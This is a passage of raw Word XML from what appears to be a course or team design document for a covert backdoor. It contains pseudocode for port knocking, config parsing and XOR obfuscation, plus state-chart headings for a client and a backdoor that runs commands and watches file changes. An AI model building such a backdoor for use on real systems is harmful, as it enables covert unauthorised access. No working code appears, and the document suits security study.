                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> != null // there is a knocking pattern, otherwise do nothing</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 xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>temp.array</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports.split</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(“,”) // split up the ports</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> port in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>temp.array</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">               send a packet to port</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               do not wait for a response; sleep (1);</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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>read(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>config_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     while (there is a line to read)</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 xml:space="preserve">           read each line of the file, </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">           split using a delimiter (probably “=”) into key, value pairs</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">           switch statement (key)</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 xml:space="preserve">                case “FILE”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_to_read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> variable with its value pair</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                case “KNOCKING”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to its value pair</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                case “DIRECTORY”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DIRECTORY_to_monitor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to its value pair</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                ... (other cases to be determined)</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 xml:space="preserve">     }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/* Our Encryption/Decryption Method */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">XOR(item) // using XOR </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     put item into algorithm to scramble/unscramble</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     return scrambled/unscrambled data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00634A4B" w:rsidRDefault="00634A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="h.k2bwhts8clin" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc405739259"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>State Chart Diagrams</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="h.s0c8tgikobse" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="18" w:name="_Toc405739260"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:t>Client - Listening Mode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41" name="image89.png" descr="Screenshot from 2014-10-20 12:33:47.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image89.png" descr="Screenshot from 2014-10-20 12:33:47.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3327400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="h.chyjspvkzm6d" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="20" w:name="_Toc405739261"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:t>Client - Commanding Mode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="image19.png" descr="Screenshot from 2014-10-20 12:46:42.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png" descr="Screenshot from 2014-10-20 12:46:42.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2641600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634A4B" w:rsidRDefault="00634A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="h.bz7xm989dh8z" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc405739262"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Backdoor - Running Commands</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2540000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="image82.png" descr="Screenshot from 2014-10-20 12:46:47.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image82.png" descr="Screenshot from 2014-10-20 12:46:47.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="h.jlyxp4dx4yf3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="24" w:name="_Toc405739263"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:t>Backdoor - File &amp; Directory Changes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2451100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="image36.png" descr="Screenshot from 2014-10-20 12:46:44.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image36.png" descr="Screenshot from 2014-10-20 12:46:44.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2451100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="h.y0638me7fmlk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc405739264"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scheduled Timeline, Tasks &amp; Milestones</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="78" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2703"/>
        <w:gridCol w:w="4112"/>
        <w:gridCol w:w="2494"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1316"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="000000" w:fill="000000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Team Members</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="000000" w:fill="000000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
